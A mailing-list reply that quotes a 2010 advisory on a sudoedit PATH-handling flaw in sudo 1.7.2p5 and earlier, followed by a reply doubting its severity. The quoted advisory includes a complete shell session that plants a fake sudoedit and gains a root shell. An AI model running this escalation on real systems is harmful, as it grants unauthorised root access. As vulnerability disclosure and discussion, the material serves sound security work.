On 2010-04-19 Agazzini Maurizio wrote: > 1. Abstract. > > While writing an article about the vulnerability outlined in > CVE-2010-0426, we found a distinct security flaw, also related to the > sudoedit pseudo-command. Specifically, the path component of sudoedit > is not checked correctly. This can be easily exploited by a local user > with permission to run sudoedit, in order to execute arbitrary > commands as root. > > 2. Example Attack Session. > > inode@pandora:~$ echo "/bin/sh" > sudoedit > inode@pandora:~$ /usr/bin/chmod +x sudoedit > inode@pandora:~$ id > uid=1000(inode) gid=100(users) groups=100(users) > inode@pandora:~$ export PATH=. > inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts > Password: > sh-3.1# /usr/bin/id > uid=0(root) gid=0(root) > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel), > 11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev), > 84(power),86(netdev),93(scanner) > sh-3.1# > > 3. Affected Platforms. > > All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of > this vulnerability requires that the /etc/sudoers file be configured > to allow the attacker to run sudoedit. Perhaps I'm missing something, but how is this a security flaw? A user who is allowed to run "sudoedit" can edit /etc/sudoers, and thus allow himself to run any command anyway. Regards Ansgar Wiechers -- "All vulnerabilities deserve a public fear period prior to patches becoming available." --Jason Coombs on Bugtraq
